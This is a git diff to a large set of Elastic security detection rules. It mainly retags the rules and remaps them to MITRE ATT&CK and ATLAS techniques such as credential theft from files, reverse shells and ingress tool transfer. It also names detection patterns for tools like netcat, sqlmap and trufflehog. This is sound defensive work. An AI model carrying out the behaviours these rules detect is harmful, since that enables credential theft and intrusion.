...picious_execution_from_mounted_device.toml | 27 +++- ...n_suspicious_managedcode_host_process.toml | 59 ++++++--- ...picious_process_access_direct_syscall.toml | 25 +--- ...efense_evasion_suspicious_scrobj_load.toml | 10 +- ...defense_evasion_suspicious_wmi_script.toml | 28 +--- ...evasion_suspicious_zoom_child_process.toml | 48 ++----- ..._critical_proc_abnormal_file_activity.toml | 41 ++---- ...sion_unsigned_dll_loaded_from_suspdir.toml | 15 +-- ...fense_evasion_untrusted_driver_loaded.toml | 19 ++- ...nusual_network_connection_via_dllhost.toml | 29 ++-- ...usual_network_connection_via_rundll32.toml | 37 +++--- ...on_unusual_process_network_connection.toml | 23 +++- ...vasion_wdac_policy_by_unusual_process.toml | 8 +- .../defense_evasion_wsl_bash_exec.toml | 31 +---- .../defense_evasion_wsl_enabled_via_dism.toml | 15 +-- .../defense_evasion_wsl_kalilinux.toml | 45 ++++--- ...nse_evasion_wsl_registry_modification.toml | 10 +- ...discovery_active_directory_webservice.toml | 8 +- .../discovery_ad_explorer_execution.toml | 17 +-- .../discovery_adfind_command_activity.toml | 12 +- .../discovery_command_system_account.toml | 36 +---- ...enumerating_domain_trusts_via_dsquery.toml | 8 +- .../discovery_high_number_ad_properties.toml | 18 ++- ...scovery_host_public_ip_address_lookup.toml | 39 +----- .../discovery_posh_invoke_sharefinder.toml | 50 +------ ...scovery_posh_suspicious_api_functions.toml | 65 +++------ .../discovery_whoami_command_activity.toml | 8 +- ...arwinds_backdoor_child_cmd_powershell.toml | 40 +----- ...inds_backdoor_unusual_child_processes.toml | 30 ++--- .../windows/execution_com_object_xwizard.toml | 35 +++-- ...and_prompt_connecting_to_the_internet.toml | 45 +++---- ...tion_command_shell_started_by_svchost.toml | 18 ++- ...mand_shell_started_by_unusual_process.toml | 8 +- .../execution_command_shell_via_rundll32.toml | 69 ++++------ ...tion_delayed_via_ping_lolbas_unsigned.toml | 62 ++++----- .../execution_downloaded_shortcut_files.toml | 36 +---- .../execution_downloaded_url_file.toml | 34 +---- .../execution_enumeration_via_wmiprvse.toml | 61 ++++----- .../execution_from_unusual_path_cmdline.toml | 64 ++++++--- ...le_program_connecting_to_the_internet.toml | 49 +++---- ...cution_initial_access_foxmail_exploit.toml | 17 ++- ...execution_initial_access_via_msc_file.toml | 61 ++++----- ...cution_initial_access_wps_dll_exploit.toml | 33 ++--- rules/windows/execution_mofcomp.toml | 23 +--- .../execution_ms_office_written_file.toml | 38 +++--- .../execution_posh_hacktool_functions.toml | 104 +++++++++++++-- .../execution_posh_portable_executable.toml | 32 ++--- ...on_powershell_susp_args_via_winscript.toml | 12 +- ...ution_psexec_lateral_movement_command.toml | 17 +-- ...er_program_connecting_to_the_internet.toml | 23 +--- .../execution_revshell_cmd_via_netcat.toml | 28 ++-- ...tion_scheduled_task_powershell_source.toml | 43 +++--- .../execution_scripting_remote_webdav.toml | 57 +++----- .../execution_scripts_archive_file.toml | 21 ++- ...xecution_shared_modules_local_sxs_dll.toml | 34 ++--- .../windows/execution_suspicious_cmd_wmi.toml | 38 +++--- .../execution_suspicious_pdf_reader.toml | 46 ++----- .../execution_suspicious_psexesvc.toml | 38 +++--- .../execution_via_compiled_html_file.toml | 37 +----- .../execution_via_hidden_shell_conhost.toml | 48 +------ ...ion_via_mmc_console_file_unusual_path.toml | 42 +----- ...execution_windows_cmd_shell_susp_args.toml | 39 +++--- .../execution_windows_fakecaptcha_cmd_ps.toml | 76 ++++------- .../execution_windows_phish_clickfix.toml | 77 ++--------- ...xecution_windows_powershell_susp_args.toml | 35 +++-- ...xecution_windows_script_from_internet.toml | 74 +++++------ .../exfiltration_rclone_cloud_upload.toml | 8 +- .../exfiltration_smb_rare_destination.toml | 30 ++--- .../windows/impact_backup_file_deletion.toml | 8 +- ...deleting_backup_catalogs_with_wbadmin.toml | 8 +- ...pact_high_freq_file_renames_by_kernel.toml | 24 ++-- .../windows/impact_mod_critical_os_files.toml | 30 ++--- .../impact_ransomware_file_rename_smb.toml | 28 ++-- .../impact_ransomware_note_file_over_smb.toml | 28 ++-- ...e_shadow_copy_deletion_via_powershell.toml | 28 ++-- ..._volume_shadow_copy_deletion_via_wmic.toml | 26 ++-- ..._evasion_suspicious_htm_file_creation.toml | 36 +---- ...itial_access_execution_from_inetcache.toml | 56 +++----- ...access_execution_from_removable_media.toml | 25 ++-- ...l_access_execution_remote_via_msiexec.toml | 32 +---- ...al_access_execution_via_office_addins.toml | 44 +++---- ...cess_exfiltration_first_time_seen_usb.toml | 32 +---- ...ial_access_exploit_jetbrains_teamcity.toml | 68 ++++++---- ..._access_potential_webhelpdesk_exploit.toml | 56 +++++--- ...itial_access_rdp_file_mail_attachment.toml | 41 ++---- ...al_access_script_executing_powershell.toml | 41 +----- ...ccess_scripts_process_started_via_wmi.toml | 37 +----- ...cious_execution_from_vscode_extension.toml | 59 +++++---- ...l_access_suspicious_ms_exchange_files.toml | 38 +++--- ...access_suspicious_ms_exchange_process.toml | 34 +---- ...ious_ms_exchange_worker_child_process.toml | 60 +++++---- ...ss_suspicious_ms_office_child_process.toml | 72 +++++----- ...s_suspicious_ms_outlook_child_process.toml | 72 +++------- ..._suspicious_windows_server_update_svc.toml | 39 +++--- .../initial_access_url_cve_2025_33053.toml | 56 +++----- ...explorer_suspicious_child_parent_args.toml | 80 +++-------- ..._access_webshell_screenconnect_server.toml | 28 ++-- ...l_access_xsl_script_execution_via_com.toml | 46 +++---- .../lateral_movement_alternate_creds_pth.toml | 30 +++-- .../windows/lateral_movement_cmd_service.toml | 55 ++++---- ...redential_access_kerberos_correlation.toml | 39 +----- rules/windows/lateral_movement_dcom_hta.toml | 24 +--- .../windows/lateral_movement_dcom_mmc20.toml | 38 +++--- ...t_dcom_shellwindow_shellbrowserwindow.toml | 35 +++-- ...n_lanman_nullsessionpipe_modification.toml | 31 ++--- ...movement_executable_tool_transfer_smb.toml | 13 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 41 +++--- ...ment_mount_hidden_or_webdav_share_net.toml | 62 +-------- ...l_movement_powershell_remoting_target.toml | 36 +---- ...lateral_movement_rdp_enabled_registry.toml | 32 ++--- ...ovement_remote_file_copy_hidden_share.toml | 16 +-- ...ement_remote_service_installed_winlog.toml | 13 +- .../lateral_movement_remote_services.toml | 33 +++-- ..._movement_remote_task_creation_winlog.toml | 43 +++--- ...ateral_movement_scheduled_task_target.toml | 39 +++--- ...movement_unusual_dns_service_children.toml | 34 +++-- ...ement_unusual_dns_service_file_writes.toml | 30 ++--- ...l_movement_via_startup_folder_rdp_smb.toml | 31 +++-- .../lateral_movement_via_wsus_update.toml | 37 +++--- .../windows/persistence_ad_adminsdholder.toml | 35 ++--- .../persistence_adobe_hijack_persistence.toml | 15 +-- .../windows/persistence_app_compat_shim.toml | 37 +++--- .../persistence_appcertdlls_registry.toml | 39 +----- .../persistence_appinitdlls_registry.toml | 34 +---- ...persistence_browser_extension_install.toml | 8 +- ...evasion_hidden_local_account_creation.toml | 39 +++--- ...tence_evasion_registry_ifeo_injection.toml | 40 +++--- ...egistry_startup_shell_folder_modified.toml | 32 ++--- ...sistence_group_modification_by_system.toml | 25 ++-- ...istence_local_scheduled_task_creation.toml | 33 +++-- ...stence_local_scheduled_task_scripting.toml | 41 +----- ...istence_msds_alloweddelegateto_krbtgt.toml | 31 ++--- ...ersistence_msi_installer_task_startup.toml | 47 ++++--- ...persistence_msoffice_startup_registry.toml | 34 +---- .../windows/persistence_netsh_helper_dll.toml | 19 +-- ...ll_exch_mailbox_activesync_add_device.toml | 43 +----- .../persistence_powershell_profiles.toml | 39 +----- ...escalation_via_accessibility_features.toml | 24 +--- .../persistence_registry_uncommon.toml | 40 ++++-- .../persistence_remote_password_reset.toml | 30 ++--- ...ce_runtime_run_key_startup_susp_procs.toml | 10 +- ...istence_sdprop_exclusion_dsheuristics.toml | 51 +++---- .../persistence_service_dll_unsigned.toml | 56 +++----- ...stence_service_windows_service_winlog.toml | 33 +++-- .../persistence_services_registry.toml | 32 ++--- ...lder_file_written_by_unsigned_process.toml | 34 +---- .../persistence_startup_folder_scripts.toml | 12 +- ...stence_suspicious_com_hijack_registry.toml | 35 +---- ...s_image_load_scheduled_task_ms_office.toml | 36 +---- ...nce_suspicious_scheduled_task_runtime.toml | 24 ++-- ...e_suspicious_service_created_registry.toml | 40 +++--- ...uspicious_user_mandatory_profile_file.toml | 18 +-- ...istence_sysmon_wmi_event_subscription.toml | 33 +++-- ...ersistence_system_shells_via_services.toml | 60 ++++----- .../persistence_temp_scheduled_task.toml | 32 +---- .../persistence_time_provider_mod.toml | 39 +----- ..._account_added_to_privileged_group_ad.toml | 35 +++-- .../persistence_user_account_creation.toml | 13 +- .../persistence_via_application_shimming.toml | 27 +--- ...rsistence_via_bits_job_notify_command.toml | 29 ++-- ...sistence_via_hidden_run_key_valuename.toml | 60 +++------ ...sa_security_support_provider_registry.toml | 34 +---- ...emetrycontroller_scheduledtask_hijack.toml | 22 +--- ...ia_update_orchestrator_service_hijack.toml | 30 ++++- ...nt_instrumentation_event_subscription.toml | 35 +---- ...tence_via_wmi_stdregprov_run_services.toml | 49 ++++--- ...ia_xp_cmdshell_mssql_stored_procedure.toml | 53 +++----- .../persistence_webshell_detection.toml | 66 +++------- .../persistence_werfault_reflectdebugger.toml | 20 +-- ...on_account_takeover_mixed_logon_types.toml | 19 +-- ...ge_escalation_badsuccessor_dmsa_abuse.toml | 33 ++--- ...tion_create_process_as_different_user.toml | 33 +++-- ...tion_create_process_with_token_unpriv.toml | 33 +++-- ...privilege_escalation_credroaming_ldap.toml | 33 ++--- ...ilege_escalation_disable_uac_registry.toml | 56 +++----- ...alation_dmsa_creation_by_unusual_user.toml | 39 ++---- ...e_escalation_dns_serverlevelplugindll.toml | 27 ++-- ...ege_escalation_driver_newterm_imphash.toml | 32 +---- ...lege_escalation_expired_driver_loaded.toml | 33 ++--- ...lege_escalation_exploit_cve_202238028.toml | 32 +---- ...calation_gpo_schtask_service_creation.toml | 44 ++++--- ...ege_escalation_group_policy_iniscript.toml | 41 +++--- ...scalation_group_policy_scheduled_task.toml | 39 ++---- ...rivilege_escalation_installertakeover.toml | 14 +- ...scalation_krbrelayup_service_creation.toml | 44 +++---- ...privilege_escalation_lsa_auth_package.toml | 35 ++--- ...privilege_escalation_make_token_local.toml | 35 +++-- ...escalation_msi_repair_via_mshelp_link.toml | 22 +--- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...scalation_newcreds_logon_rare_process.toml | 36 +++-- ...ge_escalation_persistence_phantom_dll.toml | 51 ++----- ...on_port_monitor_print_processor_abuse.toml | 34 ++--- ...e_escalation_posh_token_impersonation.toml | 56 ++++---- ...printspooler_suspicious_file_deletion.toml | 34 ++--- ..._escalation_reg_service_imagepath_mod.toml | 59 ++++----- ...calation_rogue_windir_environment_var.toml | 10 +- ...lation_samaccountname_spoofing_attack.toml | 44 +------ ...on_service_control_spawned_script_int.toml | 100 +++++--------- ...alation_suspicious_dnshostname_update.toml | 19 +-- ...ege_escalation_takeover_new_source_ip.toml | 31 +++-- ...escalation_thread_cpu_priority_hijack.toml | 15 +-- ...lation_tokenmanip_sedebugpriv_enabled.toml | 25 ++-- ...lege_escalation_uac_bypass_com_clipup.toml | 43 +++--- ...ge_escalation_uac_bypass_com_ieinstal.toml | 56 ++------ ...n_uac_bypass_com_interface_icmluautil.toml | 55 ++------ ...alation_uac_bypass_diskcleanup_hijack.toml | 58 ++------ ...escalation_uac_bypass_dll_sideloading.toml | 40 +++--- ...ge_escalation_uac_bypass_event_viewer.toml | 24 ++-- ...ege_escalation_uac_bypass_mock_windir.toml | 40 +++--- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 40 +++--- ...tion_unusual_parentchild_relationship.toml | 40 ++---- ...n_unusual_svchost_childproc_childless.toml | 30 ++--- ...rivilege_escalation_via_ppid_spoofing.toml | 10 +- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- .../privilege_escalation_via_token_theft.toml | 30 +++-- ...on_windows_service_via_unusual_client.toml | 30 +++-- 1187 files changed, 13123 insertions(+), 22321 deletions(-) diff --git a/rules/apm/apm_403_response_to_a_post.toml b/rules/apm/apm_403_response_to_a_post.toml index ef503e3741b..05b6e24dba3 100644 --- a/rules/apm/apm_403_response_to_a_post.toml +++ b/rules/apm/apm_403_response_to_a_post.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_403"] risk_score = 47 rule_id = "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e" severity = "medium" -tags = ["Data Source: APM", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,3 +67,15 @@ Web applications often use POST requests to handle data submissions securely. Ho - Review and update the web application firewall (WAF) rules to better detect and block unauthorized POST requests, ensuring that legitimate traffic is not affected. - If applicable, engage with the development team to conduct a security review of the application code to identify and fix any potential vulnerabilities that could be exploited by attackers.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/apm/apm_405_response_method_not_allowed.toml b/rules/apm/apm_405_response_method_not_allowed.toml index 1116968ca65..b46b5811271 100644 --- a/rules/apm/apm_405_response_method_not_allowed.toml +++ b/rules/apm/apm_405_response_method_not_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_405"] risk_score = 47 rule_id = "75ee75d8-c180-481c-ba88-ee50129a6aef" severity = "medium" -tags = ["Data Source: APM", "Resources: Investigation Guide"] +tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,3 +67,15 @@ Web applications often restrict HTTP methods to protect resources, allowing only - Conduct a vulnerability assessment of the web application to identify and remediate any potential security weaknesses that could be exploited by unauthorized HTTP methods. - Document the incident, including the response actions taken, and update the incident response plan to improve future detection and response capabilities for similar threats.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/apm/apm_sqlmap_user_agent.toml b/rules/apm/apm_sqlmap_user_agent.toml index 82c01caadac..264a4d2fa50 100644 --- a/rules/apm/apm_sqlmap_user_agent.toml +++ b/rules/apm/apm_sqlmap_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["http://sqlmap.org/"] risk_score = 47 rule_id = "d49cc73f-7a16-4def-89ce-9fc7127d7820" severity = "medium" -tags = ["Data Source: APM", "Resources: Investigation Guide"] +tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -68,3 +68,20 @@ Sqlmap is a widely-used open-source tool designed to automate the detection and - Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. - Document the incident details and response actions taken for future reference and to enhance incident response procedures.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml index 8614a7cea40..61c7d4276cc 100644 --- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml +++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] @@ -55,18 +55,7 @@ references = ["https://malpedia.caad.fkie.fraunhofer.de/details/py.lamehug"] risk_score = 47 rule_id = "4ae94fc1-f08f-419f-b692-053d28219380" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: AI Model Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -150,16 +139,21 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATLAS" +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml index 5ba4932123d..6ae2b55dc7b 100644 --- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml +++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,17 +123,12 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml index 714d192afa5..6e96067d174 100644 --- a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml +++ b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,19 +116,13 @@ network where host.os.type in ("macos", "windows") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml index 47c2fb74836..ffaa3660825 100644 --- a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml +++ b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,22 +113,34 @@ event.category:network and host.os.type:macos and event.action:connection_attemp [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0072" +name = "Reverse Shell" +reference = "https://atlas.mitre.org/techniques/AML.T0072/" + +[rule.threat.tactic] +id = "AML.TA0014" +name = "Command and Control" +reference = "https://atlas.mitre.org/tactics/AML.TA0014/" [rule.new_terms] field = "new_terms_fields" value = ["destination.domain"] diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml index 0ca53756373..843b580ae3b 100644 --- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["endpoint", "suricata"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,10 +73,3 @@ note = """## Triage and analysis - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. """ -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml index 6a3c887e279..20b9041be9c 100644 --- a/rules/cross-platform/command_and_control_tunnel_qemu.toml +++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,13 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1219" -name = "Remote Access Tools" -reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml index 70427bd61ba..cce002926ea 100644 --- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml +++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,21 +57,7 @@ references = [ risk_score = 73 rule_id = "c0136397-f82a-45e5-9b9f-a3651d77e21a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Domain: LLM", - "Mitre Atlas: T0085", - "Mitre Atlas: T0085.001", - "Mitre Atlas: T0055", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0085", "Mitre Atlas: T0085.001", "Mitre Atlas: T0055"] timestamp_override = "event.ingested" type = "eql" @@ -139,26 +125,51 @@ file where event.action in ("open", "creation", "modification") and event.outcom [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1555.001" +name = "Keychain" +reference = "https://attack.mitre.org/techniques/T1555/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1555.003" +name = "Credentials from Web Browsers" +reference = "https://attack.mitre.org/techniques/T1555/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml index f4efcf94595..85e8dd9bffd 100644 --- a/rules/cross-platform/credential_access_gitleaks_execution.toml +++ b/rules/cross-platform/credential_access_gitleaks_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,14 +99,14 @@ process.name : ("gitleaks.exe", "gitleaks") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml index b6faa0d1aee..358ef937467 100644 --- a/rules/cross-platform/credential_access_trufflehog_execution.toml +++ b/rules/cross-platform/credential_access_trufflehog_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,14 @@ process.args == "--json" and process.args == "filesystem" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml index 150a6573e2d..408663c99c1 100644 --- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml +++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,14 +86,18 @@ file where event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml index bb8a738a580..0e25e6a9182 100644 --- 